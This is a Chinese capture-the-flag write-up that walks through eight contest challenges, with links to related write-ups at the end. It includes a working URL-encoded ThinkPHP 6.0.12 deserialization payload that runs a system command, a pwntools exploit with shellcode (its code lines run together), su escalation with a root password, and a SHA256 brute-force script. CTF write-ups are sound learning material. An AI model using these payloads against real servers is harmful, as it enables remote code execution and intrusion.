目录

1.签到电台

2.基于挑战码的双向认证(1,2)

3.web Ezpo

4.基于挑战码的双向认证3

5.ISO9798

6.问卷调查

7.ez_usb

8.login-nomal


1.签到电台

操作内容:

根据公众号提示

知道了模十的算法,就是每一位除以10得到的余数,所以根据提供的密码本,变成为纯数字版本

取前28位,每四个一组,得到算法结果

进行传参

flag值:

2.基于挑战码的双向认证(1,2)

操作内容:

利用MobaXterm连接47.93.176.91 26308

密码账户:player

本来文档不会,随便翻目录,发现有上级文件夹,就一级一级的点

之后发现有root文件夹,点击进去,在里面翻到flag_sever ,尝试着点进去

发现有俩个flag.txt

点击不行,但发现可以读就用命令行如下

cd /root/cube-shell/instance/flag_server
cat flag1.txt
cat flag2.txt

flag值:

3.web Ezpo

操作内容:

ThinkPHP6.0.12LTS反序列漏洞分析

ThinkPHP6.0.12LTS反序列漏洞分析 - FreeBuf网络安全行业门户

ThinkPHP 6.0.12 Unserialize RCE · Issue #2717 · top-think/framework · GitHub

根据这俩篇文章构造参数

a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22cat+%2Fflag.txt%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22cat+%2Fflag.txt%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D

flag值:

4.基于挑战码的双向认证3

操作内容:

和认证1,2一样,先连接,但尝试了cat抓取 不能成功

就尝试提权 su 密码toor

然后和上面一样有flag1和flag2,都尝试一遍只有flag2能用

flag值:

5.ISO9798

操作内容:

首先nc连接上,出现一个编码sha256,{xxxx+}的符号,就在想需要爆破一下,脚本如下

from hashlib import *
table='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
zifuc='dWCjMIkQL5VT8x1T'
l='7f07d17783e49ffd82bee4bdfccd83a63639e6cfd25730fd12751b0894eb9de1'
for c1 in table:for c2 in table:for c3 in table:for c4 in table:hashvalue=sha256((c1+c2+c3+c4+zifuc).encode()).hexdigest()if hashvalue==l:print(c1+c2+c3+c4)quit()

爆破出四位密码

根据终端提示128位16进制,随便输入

得出数据

之后给的出的数据分组

得到flag

flag值:

6.问卷调查

操作内容:

填写问卷调查得到flag

flag值:

7.ez_usb

操作内容:

参考:https://blog.csdn.net/qq_44108455/article/details/108179086

分别导出特定分组

利用kali

分别得到压缩包和压缩包密码

利用脚本运行压缩包

打开压缩包,密码为:35c535765e50074a

flag值:

8.login-nomal

操作内容:

首先提权login文件

运行脚本

from pwn import*ip = "’47.93.158.95’,17363"
io = process('./login')
elf = ELF('./login')
libc = elf.libc
#libc = ELF('./libc-2.23.so')
context(log_level='debug',os='linux',arch='amd64')def my_read(content):size = len(content)io2.recvuntil(">")io2.send('n:'+ str(size)+'\r\n' + 'op:2\r\n\n')io2.recvuntil("?")io2.send(content)def my_write(size):io2.recvuntil(">")io2.send('n:'+ str(size)+'\r\n' + 'op:3\r\n\n')io2.recvuntil(">>>")
io2.sendline('opt:1\r\nmsg:ro0t\r\n')shellcode = '''
Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t
'''io2.recvuntil(">>>")
io2.sendline('opt:2\r\nmsg:'+shellcode+'\r\n')io2.interactive()

得到flag

flag值:

flag{72604c53-88be-418b-8c4b-dadfeae559c5}

2020ciscn wp相关推荐

  1. 2020ciscn 部分二进制WP(持续更新)

    Reverse 0x0 z3 从名字来看,暗示了使用z3解决这道题.分析main函数可以看出是一个42元一次方程组. 最后在比较结果. [脚本]: from z3 import*ans=[0x4f17 ...

  2. [WP]使用ApacheCordova开发HTML5-WindowsPhone应用程序

    下载代码示例 这篇文章介绍 Apache 科尔多瓦,创建使用 HTML5 和 JavaScript,跨平台移动应用程序的框架,并显示了如何使用它为 Windows Phone 开发应用程序. Wind ...

  3. wp实例开发精品文章源码推荐

    qianqianlianmeng wp实例开发精品文章源码推荐 WP8 启动媒体应用         这个示例演示了如何选择正确的msAudioCategory类别的音像(AV)流来配置它作为一个音频 ...

  4. cocos2d-xna for win8源代码轻松移植cocos-xna for wp游戏

    无意间看到杨哥弄了一个cocos2d-xna for win8出来可惜没有放出源代码,我试着要了一下结果他没理我,各种画圈圈. 那我只好自己弄一个了,源代码放出大家供交流学习使用,像杨哥说的一样就是一 ...

  5. linux 更改wp版本号,代码实现移除 WordPress 版本号

    默认情况下,WordPress会在页头输出版本号,有一定安全隐患. 在当前主题的functions.php中添加以下代码,可同时移除feed和js/css中的WordPress版本号: // 同时删除 ...

  6. 图解 wp WordPress 文章 链接 在新窗口打开

    wp WordPress 文章 链接 在新窗口打开 因为wp默认是不在新窗口打开链接的,这对于我们这样习惯关窗口的人,用起来很不方便.其实改起来很简单,下面开始 一.打开外观,选择编辑 二.打开主题页 ...

  7. 正确设置语言,加速WP应用提交

            App Hub在7月18日进行了更新.有些用户反馈新增的默认语言选项有点令人费解.本文简单做个介绍,帮助开发者正确设置语言,加速WP应用提交快速.这次的系统更新后,App Hub可以检 ...

  8. wordpress必装的插件 wp最常用的十个插件

    wordpress是世界上著名的博客系统,简称wp.一般新安装完wordpress以后,往往需要首先安装一些插件,这样才可以使用wordpress的更多功能.wp最常用的十个插件有哪些呢,可能根据每个 ...

  9. WP老杨解迷:开发生态两极化和榜单乱象

    WP老杨解迷:开发生态两极化和榜单乱象 Windows Phone 自2013年的一片浪潮推动下,2014年终于开始引起了各大小CP们的注意,于是大量的产品开始乘风破浪一路涌进Windows Phon ...

最新文章

  1. 一个简单的 Python-kivy 小程序
  2. 《Windows 8 权威指南》——1.5 版本对比
  3. 不常见但很有用的chrome调试工具使用方法
  4. 01两数之和(哈希表)
  5. 科大星云诗社动态20201228
  6. Boost:bimap双图的突变关系的测试程序
  7. UnicodeDecodeError: 'ascii' codec can't decode byte 0x82 in position 4..... 针对调用文件出现该错误时的解决办法
  8. Sping Cloud Eureka
  9. angular4设置全局变量_angularjs 设置全局变量的7种方法
  10. 对clear float 的理解
  11. 如何利用开源项目,帮助企业免费搭建小程序官网
  12. 对于引用的控件被拒绝访问的解决办法的补充(续)
  13. 关于计算机应用技术的创业策划书,计算机创业项目计划书.docx
  14. 【解决问题】java.lang.ClassNotFoundException: com.Application 问题的几种解决方案
  15. 学习和使用技术的4种层次
  16. Servlet判断用户是否登陆过、异地登录和登出功能
  17. 虚拟服务器怎么选操作系统,虚拟主机怎样选择合适的操作系统
  18. EAccessViolation型错误
  19. 【大数据 BI】传统BI流程
  20. 安装某考试软件提示MDAC没有安装或者出错

热门文章

  1. c语言内存驻留程序,关于用C语言检查内存驻留问题的研究
  2. 磁场强度切向分量连续性证明
  3. android之壁纸相关
  4. addweek oracle_Oracle数据库常用语法
  5. V8 堆外内存 ArrayBuffer 垃圾回收的实现
  6. 2021年上半年总结
  7. Unity-动画-动画回调函数接口StateMachineBehaviour
  8. iOS获取视频文件大小和时长
  9. 13.Python中的命名空间是什么
  10. MATLAB-自动控制原理-时域分析